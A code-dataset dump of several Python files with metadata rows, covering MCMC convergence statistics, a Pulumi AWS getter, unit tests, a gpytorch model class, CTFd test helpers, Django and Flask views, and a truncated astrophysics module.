| 49.458937 | 117 | 0.511428 | 1,191 | 10,238 | 3.985726 | 0.179681 | 0.0257 | 0.051822 | 0.050137 | 0.68043 | 0.669686 | 0.633453 | 0.609859 | 0.603328 | 0.576153 | 0 | 0.015811 | 0.153643 | 10,238 | 206 | 118 | 49.699029 | 0.532025 | 0.368529 | 0 | 0.5 | 0 | 0 | 0.202672 | 0.064392 | 0 | 0 | 0 | 0.004854 | 0.202899 | 0 | null | null | 0.036232 | 0.057971 | null | null | 0.036232 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c75ec65b0817a875da33fd517bd4f04f459ffba4 | 2,852 | py | Python | cosmosis/runtime/analytics.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-09-15T10:10:26.000Z | 2021-09-15T10:10:26.000Z | cosmosis/runtime/analytics.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | null | null | null | cosmosis/runtime/analytics.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-06-11T15:29:43.000Z | 2021-06-11T15:29:43.000Z | #coding: utf-8
from __future__ import print_function
from builtins import zip
from builtins import object
from cosmosis import output as output_module
import numpy as np
import sys
import os
class Analytics(object):
def __init__(self, params, pool=None):
self.params = params
self.pool = pool
self.total_steps = 0
nparam = len(params)
self.means = np.zeros(nparam)
self.m2 = np.zeros(nparam)
self.cov_times_n = np.zeros((nparam,nparam))
def add_traces(self, traces):
if traces.shape[1] != len(self.params):
raise RuntimeError("The number of traces added to Analytics "
"does not match the number of varied "
"parameters!")
num = float(self.total_steps)
for x in traces:
num += 1.0
delta = x - self.means
old_means = self.means.copy()
self.means += delta/num
self.m2 += delta*(x - self.means)
self.cov_times_n += np.outer(x-self.means, x-old_means)
self.total_steps += traces.shape[0]
def trace_means(self):
if self.pool:
return np.array(self.pool.gather(self.means)).T
else:
return self.means
def trace_variances(self):
if self.total_steps > 1:
local_variance = self.m2 / float(self.total_steps-1)
if self.pool:
return np.array(self.pool.gather(local_variance)).T
else:
return local_variance
return None
def gelman_rubin(self, quiet=True):
# takes current traces and returns
if self.pool is None or not self.pool.size > 1:
raise RuntimeError("Gelman-Rubin statistic is only "
"valid for multiple chains.")
if self.total_steps == 0:
raise RuntimeError("Gelman-Rubin statistic not "
"defined for 0-length chains.")
# gather trace statistics to master process
means = self.trace_means()
variances = self.trace_variances()
if self.pool.is_master():
B_over_n = np.var(means, ddof=1, axis=1)
B = B_over_n * self.total_steps
W = np.mean(variances, axis=1)
V = ((1. - 1./self.total_steps) * W +
(1. + 1./self.pool.size) * B_over_n)
# TODO: check for 0-values in W
Rhat = np.sqrt(V/W)
else:
Rhat = None
Rhat = self.pool.bcast(Rhat)
if not quiet and self.pool.is_master():
print()
print("Gelman-Rubin:")
for (p,R) in zip(self.params, Rhat):
print(" ", p, " ", R)
print("Worst = ", Rhat.max())
print()
return Rhat
| 31.688889 | 73 | 0.543829 | 361 | 2,852 | 4.182825 | 0.310249 | 0.058278 | 0.074172 | 0.019868 | 0.117881 | 0.049007 | 0.049007 | 0.049007 | 0.049007 | 0 | 0 | 0.011983 | 0.356241 | 2,852 | 89 | 74 | 32.044944 | 0.810458 | 0.041374 | 0 | 0.1 | 0 | 0 | 0.08315 | 0 | 0 | 0 | 0 | 0.011236 | 0 | 1 | 0.071429 | false | 0 | 0.1 | 0 | 0.271429 | 0.085714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7675ba7953da5231174f58bf3d8e9f9039a7d72 | 5,668 | py | Python | sdk/python/pulumi_aws_native/workspaces/get_workspace.py | pulumi/pulumi-aws-native | 1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3 | [
"Apache-2.0"
] | 29 | 2021-09-30T19:32:07.000Z | 2022-03-22T21:06:08.000Z | sdk/python/pulumi_aws_native/workspaces/get_workspace.py | pulumi/pulumi-aws-native | 1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3 | [
"Apache-2.0"
] | 232 | 2021-09-30T19:26:26.000Z | 2022-03-31T23:22:06.000Z | sdk/python/pulumi_aws_native/workspaces/get_workspace.py | pulumi/pulumi-aws-native | 1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3 | [
"Apache-2.0"
] | 4 | 2021-11-10T19:42:01.000Z | 2022-02-05T10:15:49.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetWorkspaceResult',
'AwaitableGetWorkspaceResult',
'get_workspace',
'get_workspace_output',
]
@pulumi.output_type
class GetWorkspaceResult:
def __init__(__self__, bundle_id=None, directory_id=None, id=None, root_volume_encryption_enabled=None, tags=None, user_volume_encryption_enabled=None, volume_encryption_key=None, workspace_properties=None):
if bundle_id and not isinstance(bundle_id, str):
raise TypeError("Expected argument 'bundle_id' to be a str")
pulumi.set(__self__, "bundle_id", bundle_id)
if directory_id and not isinstance(directory_id, str):
raise TypeError("Expected argument 'directory_id' to be a str")
pulumi.set(__self__, "directory_id", directory_id)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if root_volume_encryption_enabled and not isinstance(root_volume_encryption_enabled, bool):
raise TypeError("Expected argument 'root_volume_encryption_enabled' to be a bool")
pulumi.set(__self__, "root_volume_encryption_enabled", root_volume_encryption_enabled)
if tags and not isinstance(tags, list):
raise TypeError("Expected argument 'tags' to be a list")
pulumi.set(__self__, "tags", tags)
if user_volume_encryption_enabled and not isinstance(user_volume_encryption_enabled, bool):
raise TypeError("Expected argument 'user_volume_encryption_enabled' to be a bool")
pulumi.set(__self__, "user_volume_encryption_enabled", user_volume_encryption_enabled)
if volume_encryption_key and not isinstance(volume_encryption_key, str):
raise TypeError("Expected argument 'volume_encryption_key' to be a str")
pulumi.set(__self__, "volume_encryption_key", volume_encryption_key)
if workspace_properties and not isinstance(workspace_properties, dict):
raise TypeError("Expected argument 'workspace_properties' to be a dict")
pulumi.set(__self__, "workspace_properties", workspace_properties)
@property
@pulumi.getter(name="bundleId")
def bundle_id(self) -> Optional[str]:
return pulumi.get(self, "bundle_id")
@property
@pulumi.getter(name="directoryId")
def directory_id(self) -> Optional[str]:
return pulumi.get(self, "directory_id")
@property
@pulumi.getter
def id(self) -> Optional[str]:
return pulumi.get(self, "id")
@property
@pulumi.getter(name="rootVolumeEncryptionEnabled")
def root_volume_encryption_enabled(self) -> Optional[bool]:
return pulumi.get(self, "root_volume_encryption_enabled")
@property
@pulumi.getter
def tags(self) -> Optional[Sequence['outputs.WorkspaceTag']]:
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="userVolumeEncryptionEnabled")
def user_volume_encryption_enabled(self) -> Optional[bool]:
return pulumi.get(self, "user_volume_encryption_enabled")
@property
@pulumi.getter(name="volumeEncryptionKey")
def volume_encryption_key(self) -> Optional[str]:
return pulumi.get(self, "volume_encryption_key")
@property
@pulumi.getter(name="workspaceProperties")
def workspace_properties(self) -> Optional['outputs.WorkspaceProperties']:
return pulumi.get(self, "workspace_properties")
class AwaitableGetWorkspaceResult(GetWorkspaceResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetWorkspaceResult(
bundle_id=self.bundle_id,
directory_id=self.directory_id,
id=self.id,
root_volume_encryption_enabled=self.root_volume_encryption_enabled,
tags=self.tags,
user_volume_encryption_enabled=self.user_volume_encryption_enabled,
volume_encryption_key=self.volume_encryption_key,
workspace_properties=self.workspace_properties)
def get_workspace(id: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWorkspaceResult:
"""
Resource Type definition for AWS::WorkSpaces::Workspace
"""
__args__ = dict()
__args__['id'] = id
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('aws-native:workspaces:getWorkspace', __args__, opts=opts, typ=GetWorkspaceResult).value
return AwaitableGetWorkspaceResult(
bundle_id=__ret__.bundle_id,
directory_id=__ret__.directory_id,
id=__ret__.id,
root_volume_encryption_enabled=__ret__.root_volume_encryption_enabled,
tags=__ret__.tags,
user_volume_encryption_enabled=__ret__.user_volume_encryption_enabled,
volume_encryption_key=__ret__.volume_encryption_key,
workspace_properties=__ret__.workspace_properties)
@_utilities.lift_output_func(get_workspace)
def get_workspace_output(id: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetWorkspaceResult]:
"""
Resource Type definition for AWS::WorkSpaces::Workspace
"""
...
| 41.985185 | 211 | 0.711009 | 655 | 5,668 | 5.783206 | 0.174046 | 0.152059 | 0.145723 | 0.085533 | 0.399155 | 0.288015 | 0.217001 | 0.131204 | 0.054382 | 0.054382 | 0 | 0.000219 | 0.195483 | 5,668 | 134 | 212 | 42.298507 | 0.830482 | 0.054693 | 0 | 0.09434 | 1 | 0 | 0.172051 | 0.077573 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113208 | false | 0 | 0.056604 | 0.075472 | 0.283019 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c768fa044e6b10f72fbfbfa85435ada393a83af3 | 673 | py | Python | tests/test_distance.py | mkclairhong/quail | a6d6502746c853518a670d542222eb5fc2b05542 | [
"MIT"
] | 1 | 2018-05-30T15:33:26.000Z | 2018-05-30T15:33:26.000Z | tests/test_distance.py | mkclairhong/quail | a6d6502746c853518a670d542222eb5fc2b05542 | [
"MIT"
] | null | null | null | tests/test_distance.py | mkclairhong/quail | a6d6502746c853518a670d542222eb5fc2b05542 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from quail.distance import *
import numpy as np
import pytest
from scipy.spatial.distance import cdist
def test_match():
a = 'A'
b = 'B'
assert np.equal(match(a, b), 1)
def test_euclidean_list():
a = [0, 1, 0]
b = [0, 1, 0]
assert np.equal(euclidean(a, b), 0)
def test_euclidean_array():
a = np.array([0, 1, 0])
b = np.array([0, 1, 0])
assert np.equal(euclidean(a, b), 0)
def test_correlation_list():
a = [0, 1, 0]
b = [0, 1, 0]
assert np.equal(correlation(a, b), 1)
def test_correlation_array():
a = np.array([0, 1, 0])
b = np.array([0, 1, 0])
assert np.equal(correlation(a, b), 1)
| 21.03125 | 41 | 0.580981 | 117 | 673 | 3.264957 | 0.230769 | 0.041885 | 0.062827 | 0.041885 | 0.557592 | 0.513089 | 0.513089 | 0.513089 | 0.513089 | 0.513089 | 0 | 0.058594 | 0.239227 | 673 | 31 | 42 | 21.709677 | 0.6875 | 0.031204 | 0 | 0.5 | 0 | 0 | 0.003077 | 0 | 0 | 0 | 0 | 0 | 0.208333 | 1 | 0.208333 | false | 0 | 0.166667 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c76ca1375282328ef3e6038f93b1edf1d46d7f49 | 1,728 | py | Python | af/shovel/test_canning.py | mimi89999/pipeline | 3e9eaf74c0966df907a230fbe89407c2bbc3d930 | [
"BSD-3-Clause"
] | null | null | null | af/shovel/test_canning.py | mimi89999/pipeline | 3e9eaf74c0966df907a230fbe89407c2bbc3d930 | [
"BSD-3-Clause"
] | null | null | null | af/shovel/test_canning.py | mimi89999/pipeline | 3e9eaf74c0966df907a230fbe89407c2bbc3d930 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python2.7
import unittest
import canning
class TestNop(unittest.TestCase):
def test_nop(self):
canning.NopTeeFd.write("asdf")
class TestSlice(unittest.TestCase):
REPORT = "20130505T065614Z-VN-AS24173-dns_consistency-no_report_id-0.1.0-probe.yaml"
@staticmethod
def rpt(year):
assert year < 10000
return "{:04d}1231T065614Z-VN-AS24173-dns_consistency-no_report_id-0.1.0-probe.yaml".format(
year
)
def test_empty(self):
asis, tarfiles = canning.pack_bucket(tuple())
self.assertFalse(asis)
self.assertFalse(tarfiles)
def test_badname(self):
self.assertRaises(RuntimeError, canning.pack_bucket, [("foo", 42)])
self.assertRaises(
RuntimeError, canning.pack_bucket, [("2013-05-05/" + self.REPORT, 42)]
)
def test_single(self):
for sz in [0, 1, 65 * 1048576]:
asis, tarfiles = canning.pack_bucket([(self.REPORT, sz)])
self.assertEqual(asis, [self.REPORT])
self.assertFalse(tarfiles)
def test_packing(self):
asis, tarfiles = canning.pack_bucket(
[(self.rpt(0), 42), (self.rpt(1), 64), (self.rpt(2), 64 * 1048576)]
)
self.assertEqual(asis, [self.rpt(2)])
self.assertEqual(tarfiles, {"dns_consistency.0.tar": map(self.rpt, (0, 1))})
def test_stupid(self): # FIXME: is it really good behaviour?...
asis, tarfiles = canning.pack_bucket(
[(self.rpt(0), 42), (self.rpt(1), 64 * 1048576 - 1), (self.rpt(2), 64)]
)
self.assertEqual(asis, map(self.rpt, (0, 1, 2)))
self.assertEqual(tarfiles, {})
if __name__ == "__main__":
unittest.main()
| 30.315789 | 100 | 0.609375 | 216 | 1,728 | 4.75 | 0.351852 | 0.061404 | 0.099415 | 0.089669 | 0.421053 | 0.339181 | 0.183236 | 0.183236 | 0.183236 | 0.183236 | 0 | 0.085366 | 0.240741 | 1,728 | 56 | 101 | 30.857143 | 0.696646 | 0.03588 | 0 | 0.097561 | 0 | 0.02439 | 0.117188 | 0.101563 | 0 | 0 | 0 | 0.017857 | 0.268293 | 1 | 0.170732 | false | 0 | 0.04878 | 0 | 0.317073 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c76e7fcaeb2193c977b2c4ee81febf00b7763cee | 2,175 | py | Python | gpytorch/models/approximate_gp.py | phumm/gpytorch | 4e8042bcecda049956f8f9e823d82ba6340766d5 | [
"MIT"
] | 1 | 2019-09-30T06:51:03.000Z | 2019-09-30T06:51:03.000Z | gpytorch/models/approximate_gp.py | phumm/gpytorch | 4e8042bcecda049956f8f9e823d82ba6340766d5 | [
"MIT"
] | null | null | null | gpytorch/models/approximate_gp.py | phumm/gpytorch | 4e8042bcecda049956f8f9e823d82ba6340766d5 | [
"MIT"
] | 1 | 2020-09-16T16:35:27.000Z | 2020-09-16T16:35:27.000Z | #!/usr/bin/env python3
from .gp import GP
from .pyro import _PyroMixin # This will only contain functions if Pyro is installed
class ApproximateGP(GP, _PyroMixin):
def __init__(self, variational_strategy):
super().__init__()
self.variational_strategy = variational_strategy
def forward(self, x):
"""
As in the exact GP setting, the user-defined forward method should return the GP prior mean and covariance
evaluated at input locations x.
"""
raise NotImplementedError
def pyro_guide(self, input, beta=1.0, name_prefix=""):
"""
(For Pyro integration only). The component of a `pyro.guide` that
corresponds to drawing samples from the latent GP function.
Args:
:attr:`input` (:obj:`torch.Tensor`)
The inputs :math:`\mathbf X`.
:attr:`beta` (float, default=1.)
How much to scale the :math:`\text{KL} [ q(\mathbf f) \Vert p(\mathbf f) ]`
term by.
:attr:`name_prefix` (str, default="")
A name prefix to prepend to pyro sample sites.
"""
return super().pyro_guide(input, beta=beta, name_prefix=name_prefix)
def pyro_model(self, input, beta=1.0, name_prefix=""):
r"""
(For Pyro integration only). The component of a `pyro.model` that
corresponds to drawing samples from the latent GP function.
Args:
:attr:`input` (:obj:`torch.Tensor`)
The inputs :math:`\mathbf X`.
:attr:`beta` (float, default=1.)
How much to scale the :math:`\text{KL} [ q(\mathbf f) \Vert p(\mathbf f) ]`
term by.
:attr:`name_prefix` (str, default="")
A name prefix to prepend to pyro sample sites.
Returns: :obj:`torch.Tensor` samples from :math:`q(\mathbf f)`
"""
return super().pyro_model(input, beta=beta, name_prefix=name_prefix)
def __call__(self, inputs, prior=False, **kwargs):
if inputs.dim() == 1:
inputs = inputs.unsqueeze(-1)
return self.variational_strategy(inputs, prior=prior)
| 38.157895 | 114 | 0.593563 | 276 | 2,175 | 4.568841 | 0.355072 | 0.079302 | 0.054718 | 0.042823 | 0.536082 | 0.536082 | 0.536082 | 0.496431 | 0.439334 | 0.374306 | 0 | 0.00584 | 0.291494 | 2,175 | 56 | 115 | 38.839286 | 0.812459 | 0.538391 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.294118 | false | 0 | 0.117647 | 0 | 0.647059 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c774024668ea75381f4aedf887a584aaa227cbf7 | 320 | py | Python | 1stRound/Medium/322-Coin Change/DP.py | ericchen12377/Leetcode-Algorithm-Python | eb58cd4f01d9b8006b7d1a725fc48910aad7f192 | [
"MIT"
] | 2 | 2020-04-24T18:36:52.000Z | 2020-04-25T00:15:57.000Z | 1stRound/Medium/322-Coin Change/DP.py | ericchen12377/Leetcode-Algorithm-Python | eb58cd4f01d9b8006b7d1a725fc48910aad7f192 | [
"MIT"
] | null | null | null | 1stRound/Medium/322-Coin Change/DP.py | ericchen12377/Leetcode-Algorithm-Python | eb58cd4f01d9b8006b7d1a725fc48910aad7f192 | [
"MIT"
] | null | null | null | class Solution:
def coinChange(self, coins: List[int], amount: int) -> int:
M = float('inf')
# dynamic programming
dp = [0] + [M] * amount
for i in range(1, amount+1):
dp[i] = 1 + min([dp[i-c] for c in coins if i >= c] or [M])
return dp[-1] if dp[-1] < M else -1
| 32 | 70 | 0.496875 | 52 | 320 | 3.057692 | 0.519231 | 0.037736 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033019 | 0.3375 | 320 | 9 | 71 | 35.555556 | 0.716981 | 0.059375 | 0 | 0 | 0 | 0 | 0.010033 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c77943cb74b84356ac52ea818e7a35cca299778c | 4,040 | py | Python | tests/helpers.py | ws4/TopCTFd | 3b1e25df1318e86ff163a0b546f6e9b7f8305a5a | [
"Apache-2.0"
] | 1 | 2019-06-25T09:24:29.000Z | 2019-06-25T09:24:29.000Z | tests/helpers.py | ws4/TopCTFd | 3b1e25df1318e86ff163a0b546f6e9b7f8305a5a | [
"Apache-2.0"
] | null | null | null | tests/helpers.py | ws4/TopCTFd | 3b1e25df1318e86ff163a0b546f6e9b7f8305a5a | [
"Apache-2.0"
] | null | null | null | from CTFd import create_app
from CTFd.models import *
from sqlalchemy_utils import database_exists, create_database, drop_database
from sqlalchemy.engine.url import make_url
import datetime
import six
if six.PY2:
text_type = unicode
binary_type = str
else:
text_type = str
binary_type = bytes
def create_ctfd(ctf_name="CTFd", name="admin", email="admin@ctfd.io", password="password", setup=True):
app = create_app('CTFd.config.TestingConfig')
if setup:
with app.app_context():
with app.test_client() as client:
data = {}
r = client.get('/setup') # Populate session with nonce
with client.session_transaction() as sess:
data = {
"ctf_name": ctf_name,
"name": name,
"email": email,
"password": password,
"nonce": sess.get('nonce')
}
client.post('/setup', data=data)
return app
def destroy_ctfd(app):
drop_database(app.config['SQLALCHEMY_DATABASE_URI'])
def register_user(app, name="user", email="user@ctfd.io", password="password"):
with app.app_context():
with app.test_client() as client:
r = client.get('/register')
with client.session_transaction() as sess:
data = {
"name": name,
"email": email,
"password": password,
"nonce": sess.get('nonce')
}
client.post('/register', data=data)
def login_as_user(app, name="user", password="password"):
with app.app_context():
with app.test_client() as client:
r = client.get('/login')
with client.session_transaction() as sess:
data = {
"name": name,
"password": password,
"nonce": sess.get('nonce')
}
client.post('/login', data=data)
return client
def get_scores(user):
scores = user.get('/scores')
scores = json.loads(scores.get_data(as_text=True))
return scores['standings']
def gen_challenge(db, name='chal_name', description='chal_description', value=100, category='chal_category', type=0):
chal = Challenges(name, description, value, category)
db.session.add(chal)
db.session.commit()
return chal
def gen_award(db, teamid, name="award_name", value=100):
award = Awards(teamid, name, value)
db.session.add(award)
db.session.commit()
return award
def gen_tag(db, chal, tag='tag_tag'):
tag = Tags(chal, tag)
db.session.add(tag)
db.session.commit()
return tag
def gen_file():
pass
def gen_flag(db, chal, flag='flag', key_type=0):
key = Keys(chal, flag, key_type)
db.session.add(key)
db.session.commit()
return key
def gen_team(db, name='name', email='user@ctfd.io', password='password'):
team = Teams(name, email, password)
db.session.add(team)
db.session.commit()
return team
def gen_hint(db, chal, hint="This is a hint", cost=0, type=0):
hint = Hints(chal, hint, cost, type)
db.session.add(hint)
db.session.commit()
return hint
def gen_solve(db, teamid, chalid, ip='127.0.0.1', flag='rightkey'):
solve = Solves(teamid, chalid, ip, flag)
solve.date = datetime.datetime.utcnow()
db.session.add(solve)
db.session.commit()
return solve
def gen_wrongkey(db, teamid, chalid, ip='127.0.0.1', flag='wrongkey'):
wrongkey = WrongKeys(teamid, chalid, ip, flag)
wrongkey.date = datetime.datetime.utcnow()
db.session.add(wrongkey)
db.session.commit()
return wrongkey
def gen_tracking(db, ip, team):
tracking = Tracking(ip, team)
db.session.add(tracking)
db.session.commit()
return tracking
def gen_page(db, route, html):
page = Pages(route, html)
db.session.add(page)
db.session.commit()
return page
| 27.297297 | 117 | 0.592574 | 506 | 4,040 | 4.628459 | 0.209486 | 0.076857 | 0.051238 | 0.089667 | 0.272844 | 0.272844 | 0.253202 | 0.204526 | 0.186166 | 0.128096 | 0 | 0.00789 | 0.278465 | 4,040 | 147 | 118 | 27.482993 | 0.79554 | 0.006683 | 0 | 0.292035 | 0 | 0 | 0.096485 | 0.011967 | 0 | 0 | 0 | 0 | 0 | 1 | 0.141593 | false | 0.079646 | 0.053097 | 0 | 0.309735 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c77bfcd69447b6d8753b518a3930aaea586d8856 | 440 | py | Python | support/views.py | bhagirath1312/ich_bau | d37fe7aa3379f312a4d8b5f3d4715dd334b9adb0 | [
"Apache-2.0"
] | 1 | 2021-11-25T19:37:01.000Z | 2021-11-25T19:37:01.000Z | support/views.py | bhagirath1312/ich_bau | d37fe7aa3379f312a4d8b5f3d4715dd334b9adb0 | [
"Apache-2.0"
] | 197 | 2017-09-06T22:54:20.000Z | 2022-02-05T00:04:13.000Z | support/views.py | bhagirath1312/ich_bau | d37fe7aa3379f312a4d8b5f3d4715dd334b9adb0 | [
"Apache-2.0"
] | 2 | 2017-11-08T02:13:03.000Z | 2020-09-30T19:48:12.000Z | from django.shortcuts import render, redirect
from django.http import HttpResponseRedirect
from .models import SupportProject
# Create your views here.
def index( request ):
sp = SupportProject.objects.all()
if sp.count() == 1:
return HttpResponseRedirect( sp.first().project.get_absolute_url() )
else:
context_dict = { 'sps' : sp, }
return render( request, 'support/index.html', context_dict )
| 27.5 | 76 | 0.688636 | 51 | 440 | 5.862745 | 0.686275 | 0.06689 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002874 | 0.209091 | 440 | 15 | 77 | 29.333333 | 0.856322 | 0.052273 | 0 | 0 | 0 | 0 | 0.050602 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.3 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c77d8ee927213d5c37d334a8dc0c0e3d7493a2cf | 2,221 | py | Python | app/api/user_routes.py | nappernick/envelope | af4f574c04c51293b90ee2e09d0f95d12ca36d2c | [
"MIT"
] | 2 | 2021-01-13T22:52:16.000Z | 2021-01-29T18:37:51.000Z | app/api/user_routes.py | nappernick/envelope | af4f574c04c51293b90ee2e09d0f95d12ca36d2c | [
"MIT"
] | 32 | 2021-01-08T19:05:33.000Z | 2021-04-07T22:01:54.000Z | app/api/user_routes.py | nappernick/envelope | af4f574c04c51293b90ee2e09d0f95d12ca36d2c | [
"MIT"
] | null | null | null | from datetime import datetime
from werkzeug.security import generate_password_hash
from flask import Blueprint, jsonify, request
from sqlalchemy.orm import joinedload
from flask_login import login_required
from app.models import db, User, Type
from app.forms import UpdateUserForm
from .auth_routes import authenticate, validation_errors_to_error_messages
user_routes = Blueprint('users', __name__)
@user_routes.route("/types")
def types():
types = db.session.query(Type).all()
return jsonify([type.name_to_id() for type in types])
@user_routes.route('/')
@login_required
def users():
users = db.session.query(User).all()
return jsonify([user.to_dict_full() for user in users])
@user_routes.route('/<int:id>')
@login_required
def user(id):
user = User.query.get(id)
return user.to_dict()
@user_routes.route('/<int:id>', methods=["DELETE"])
@login_required
def user_delete(id):
user = User.query.get(id)
db.session.delete(user)
db.session.commit()
return { id: "Successfully deleted" }
@user_routes.route('/<int:id>', methods=["POST"])
@login_required
def user_update(id):
user = User.query.options(joinedload("type")).get(id)
form = UpdateUserForm()
form['csrf_token'].data = request.cookies['csrf_token']
if form.validate_on_submit():
print("_______ FORM DATA",form.data)
user.username=form.data['username'],
user.email=form.data['email'],
user.hashed_password=generate_password_hash(form.password.data),
user.first_name=form.data['first_name'],
user.last_name=form.data['last_name'],
user.type_id=form.data['type_id'],
user.updated_at=datetime.now()
db.session.commit()
return user.to_dict_full()
return {'errors': validation_errors_to_error_messages(form.errors)}
@user_routes.route("/<int:id>/clients")
@login_required
def admin_fetch_clients(id):
authenticated = authenticate()
clientUsers = db.session.query(User).filter_by(type_id=2).all()
if authenticated["type_id"] != 1:
return jsonify({
"errors": [
"Unauthorized"
]
})
return jsonify([user.to_dict_full() for user in clientUsers])
| 30.013514 | 74 | 0.692031 | 296 | 2,221 | 4.969595 | 0.283784 | 0.047587 | 0.061183 | 0.048946 | 0.182189 | 0.112848 | 0.048946 | 0.048946 | 0.048946 | 0 | 0 | 0.001086 | 0.170644 | 2,221 | 73 | 75 | 30.424658 | 0.797503 | 0 | 0 | 0.15 | 1 | 0 | 0.088699 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.033333 | 0.133333 | 0 | 0.366667 | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c782a4a5ddbb4061270df891d7584a13d55d2191 | 6,325 | py | Python | paul_analysis/Python/labird/gamma.py | lzkelley/arepo-mbh-sims_analysis | f14519552cedd39a040b53e6d7cc538b5b8f38a3 | [
"MIT"
] | null | null | null | paul_analysis/Python/labird/gamma.py | lzkelley/arepo-mbh-sims_analysis | f14519552cedd39a040b53e6d7cc538b5b8f38a3 | [
"MIT"
] | null | null | null | paul_analysis/Python/labird/gamma.py | lzkelley/arepo-mbh-sims_analysis | f14519552cedd39a040b53e6d7cc538b5b8f38a3 | [
"MIT"
] | null | null | null | """Module for finding an effective equation of state for in the Lyman-alpha forest
from a snapshot. Ported to python from Matteo Viel's IDL script."""
import h5py
import math
import numpy as np
def read_gamma(num,base):
"""Reads in an HDF5 snapshot from the NE gadget version, fits a power law to the
equation of state for low density, low temperature gas.
Inputs:
num - snapshot number
base - Snapshot directory
Outputs:
